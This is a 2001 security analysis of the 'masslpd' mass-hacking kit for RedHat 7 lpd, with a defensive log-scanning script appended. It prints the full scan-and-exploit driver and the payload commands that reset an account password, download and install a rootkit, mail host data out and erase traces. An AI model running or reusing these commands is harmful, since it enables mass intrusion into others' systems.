Date of Analysis : 30/05/01
Author : Fredrik Ostergren [ press@alldas.de ]
Description: Automatic tool to mass-hack computers using the lpd exploit for RedHat 7.
(As always, comments are in "[ ]")

-----[ Disclaimer

Information revealed in this and other analyses is in no way meant to contribute to illegal actions such as hacking or other forms of computer crime. It should serve as an informative source to prevent actions like those mentioned before.

-----[ Introduction

Some time ago a trend called "mass-hacking" entered the blackhat community. People were lazy or just greedy: they wanted access to as many computers as they could get. The compromised computers are often used for packet nets, botnets or other things that might disrupt innocent people's activities. Not to mention all the administrators whose systems get penetrated automatically. Worms and mass-hackers have existed for a long time; it's only now that the media and other organizations write about them. The last "sensation" was the sadmind/IIS 'worm'. Information is the best protection against such evil. The analysis section will try to bring understanding to you as a normal user. Enjoy!

fredrik@slaptop:~/analys/masslpd$ ls -al
total 56
drwxr-xr-x 2 fredrik users  4096 Feb 23 20:42 ./
drwxr-xr-x 3 fredrik users  4096 May 28 21:51 ../
-rwxr-xr-x 1 fredrik users  1491 Feb 23 20:08 masslpd*
-rw-r--r-- 1 fredrik users 12091 Feb 27 11:01 overlpd.c
-rwxr-xr-x 1 fredrik users 30436 Feb  8 08:38 scan*

md5sum output -
b63c0536b1a1adc76a636c5421513a20  masslpd
2bc0739181e52cc6caed8c7c3d0bd745  overlpd.c
589c2b643a7b1eb706cb4556930933fc  scan

-----[ Main

The executable file called 'scan' is a pre-compiled version of the famous network scanner synscan by psychoid (source available here: http://www.psychoid.lam3rz.de/synscan1.6.tar.gz).
The output from it looks like this:

fredrik@slaptop:~/analys/masslpd$ ./scan
SynScan 1.6 by psychoid/tCl
Usage: ./scan 1[.2[.3[.4]]]|infile outfile device(=ppp0/eth0) delay [port[,port,port-port...]]
delay depends on your connection speed. dialup = 500, t1 = 100, t3 = 50..
ports may be port,port,port also, port-port,port-port
port,port,port scans subnets at the ports given, port-port scans each host from port to port
infile must be List of numerical ips
Results will be in outfile.port (e.g. if you scan port 12345, in outfile.12345
fredrik@slaptop:~/analys/masslpd$

As you see, this scanner can scan IPs from an IP file or class A/B/C blocks based on the command-line options. The user is also able to specify the delay for each scanned host, the device being used and port ranges. This is the scanner which will try to find vulnerable hosts by scanning port 515 (the printer port).

[ masslpd ]

#!/bin/sh
#
# masslpd v1.0 by overkill        [ author takes credit ]
#
# Usage: ./masslpd 208 &          [ how to use this tool ]
#

cl="^[[0m"                        [ color codes ]
cyn="^[[36m"
wht="^[[37m"
hblk="^[[1;30m"
hgrn="^[[1;32m"
hcyn="^[[1;36m"
hwht="^[[1;37m"

echo
echo "${cl}${cyn}-=${cl}${hblk}[${cl}${hgrn}masslpd by overkill${cl}${hblk}]${cl}${cyn}=-${cl}${wht}"
echo

if [ "$1" = "" ] || [ ! $1 -le 255 ] || [ $1 -le 1 ] ; then   [ if no (or an invalid) argument is given it displays a help dialog ]
  echo "Usage: ${cl}${hwht}$0 208 &${cl}${wht}"
  exit 0
fi

if [ ! -x ./scan ] || [ ! -f ./overlpd.c ]; then   [ if scan isn't executable or overlpd.c doesn't exist the script exits ]
  echo "One of the programs was not found"
  exit 0
fi

if [ ! -x ./overlpd ]; then   [ if an executable version of overlpd doesn't exist it builds one ]
  make overlpd
fi

bbb=0
limit=255

echo "${cl}${hwht}Starting...${cl}${wht}"
echo

# We'll scan each of the B-subclasses one at a time, and not all the A-class
# ip.. this will increase the chance of your mass exploiter to produce some
# results even if (heaven forbid!) it might get killed at some point
#
# Due to a bug in synscanner's fork, when it ends scanning a B subclass,
# it won't exit on some systems, so the script can't continue. If this
# happens on your shell, add a crontab entry that looks like this:
# 0 * * * * killall -9 scan >/dev/null 2>&1

while [ $bbb -le $limit ]; do
  echo "${cl}${hgrn}Scanning $1.$bbb class..${cl}${wht}"
  ./scan $1.$bbb log eth0 50 515   [ start the scan with delay 50 on port 515; results are written to the file 'log' ]
  echo
  if [ -f log ]; then
    cat log|while read line; do ip=$(echo $line|awk -F"(" '{print $1}'); if [ "$ip" ]; then echo "${cl}${hwht}Trying $ip...${cl}${wht}"; ./overlpd $ip brute -t 0; echo; fi; done   [ reads each host out of the log file and hands it to the exploit ]
  fi
  rm -f log   [ removes evidence ]
  bbb=$[$bbb + 1]   [ moves on to the next block to scan ]
done

# Go check yer mail d00d   [ script done ]

[ end of masslpd ]

[ overlpd.c ]

The most interesting thing in the overlpd.c file is the part where it sends the commands to be processed on the penetrated host. This is a normal lpd remote exploit for RedHat 7.0 made by SEClpd. However, it's modified with the following commands to fit into this autohacker / worm (sadly we do not have a copy of the rootkit):

"unset HISTFILE; cd /tmp; echo %s > stuff; hostname -f >> stuff; cat /etc/redhat-release >> stuff 2>>stuff; uname -a >> stuff"   [ <= gathers information about the remote host into 'stuff'; it is emailed further down ]
"id >> stuff; echo >> stuff; free|grep Mem >> stuff; df >> stuff; echo >> stuff; ping -c 6 yahoo.com >> stuff"   [ same as above.... ]
"echo >> stuff; echo operator|passwd --stdin operator >> stuff 2>>stuff"
"echo operator:operator|chpasswd >>stuff 2>>stuff"   [ both lines set the password of the existing 'operator' account to 'operator', whichever command is available ]
"if [ -x /usr/bin/ncftpget ]; then ncftpget %s . /pub/.../rh7.tgz >/dev/null 2>&1; else if [ -x /usr/bin/wget ]; then wget ftp://%s/pub/.../rh7.tgz >/dev/null 2>&1; else echo no ncftpget/wget found >> stuff; fi; fi; ",   [ %s represents the host to get the rootkit from ]
"echo >> stuff; tar -xzf rh7.tgz >> stuff 2>>stuff; cd rh7; ./install >>../stuff 2>>../stuff; cat install.log >> ../stuff"   [ <= unpacks and installs the rootkit for RedHat 7 ]
"cd ..; rm -rf rh7*"   [ removing all traces ]
"cd /tmp; cat stuff|mail -s 'new root' %s"   [ mails the computer information to the address specified in %s ]
"rm -f stuff"   [ removes the information gathered ]

[ end of parts of overlpd.c ]

-----[ File summary

masslpd   = the startup script, usage : ./masslpd .
overlpd.c = the source code for the modified SEClpd remote exploit.
scan      = executable binary of synscan 1.6 by psychoid.

-----[ Conclusion

A worm/mass-hacker can create very big damage. As always, insecurity is a real problem world-wide and tools like this show us the weaknesses in our computer systems. However, they cannot be allowed to be a part of the Internet society, as the damage they can cause is devastating.

Feedback and comments on all my analyses are welcome. I hope this one made a difference and helped you to understand what a tool such as this mass-hacker is capable of doing.

Fredrik Östergren
press@alldas.de
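An added example, not part of the original analysis: masslpd's scanning phase (./scan A.B log eth0 50 515) sends one SYN to port 515 on every host of a B-class block, so a gateway that logs new inbound TCP connections sees a single source touching many distinct hosts on 515 while a real print client talks to one or two servers repeatedly. The Python below parses constructed iptables-style LOG lines (the log format, the sample addresses and the threshold are assumptions) and reports sources that probed at least min_hosts distinct printer ports.

```python
import re
from collections import defaultdict

# Constructed sample (not a real capture): 10.9.8.7 sweeps 192.168.5.0/24 on
# port 515 one SYN per host, the way synscan does; 172.16.0.9 is an ordinary
# print client that reconnects to the same print server twice.
SAMPLE_LOG = """\
May 30 02:11:01 gw kernel: IN=eth0 OUT= SRC=10.9.8.7 DST=192.168.5.1 PROTO=TCP SPT=4021 DPT=515 SYN
May 30 02:11:01 gw kernel: IN=eth0 OUT= SRC=10.9.8.7 DST=192.168.5.2 PROTO=TCP SPT=4022 DPT=515 SYN
May 30 02:11:01 gw kernel: IN=eth0 OUT= SRC=10.9.8.7 DST=192.168.5.3 PROTO=TCP SPT=4023 DPT=515 SYN
May 30 02:11:02 gw kernel: IN=eth0 OUT= SRC=10.9.8.7 DST=192.168.5.4 PROTO=TCP SPT=4024 DPT=515 SYN
May 30 02:11:02 gw kernel: IN=eth0 OUT= SRC=10.9.8.7 DST=192.168.5.5 PROTO=TCP SPT=4025 DPT=515 SYN
May 30 02:11:02 gw kernel: IN=eth0 OUT= SRC=172.16.0.9 DST=192.168.5.20 PROTO=TCP SPT=1055 DPT=515 SYN
May 30 02:11:03 gw kernel: IN=eth0 OUT= SRC=172.16.0.9 DST=192.168.5.20 PROTO=TCP SPT=1056 DPT=515 SYN
May 30 02:11:03 gw kernel: IN=eth0 OUT= SRC=10.9.8.7 DST=192.168.5.6 PROTO=TCP SPT=4026 DPT=80 SYN
"""

# Fields of an iptables LOG line we need: source, destination, destination port.
LOG_RE = re.compile(r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?DPT=(?P<dpt>\d+)")


def sweep_sources(log_text, port=515, min_hosts=5):
    """Return {src: sorted distinct destinations} for every source that probed
    at least `min_hosts` different hosts on `port`. Distinct hosts, not packet
    count, is the signal: a legitimate lpd client repeats one destination."""
    targets = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if m and int(m.group("dpt")) == port:
            targets[m.group("src")].add(m.group("dst"))
    return {src: sorted(dsts) for src, dsts in targets.items() if len(dsts) >= min_hosts}


if __name__ == "__main__":
    for src, hosts in sweep_sources(SAMPLE_LOG).items():
        print(f"port-515 sweep from {src}: {len(hosts)} hosts, e.g. {hosts[:3]}")
```

Tune min_hosts to the size of the monitored network; masslpd walks all 256 class-C blocks of each B-class, so even a small window of logs from one block will show dozens of distinct destinations from the same source.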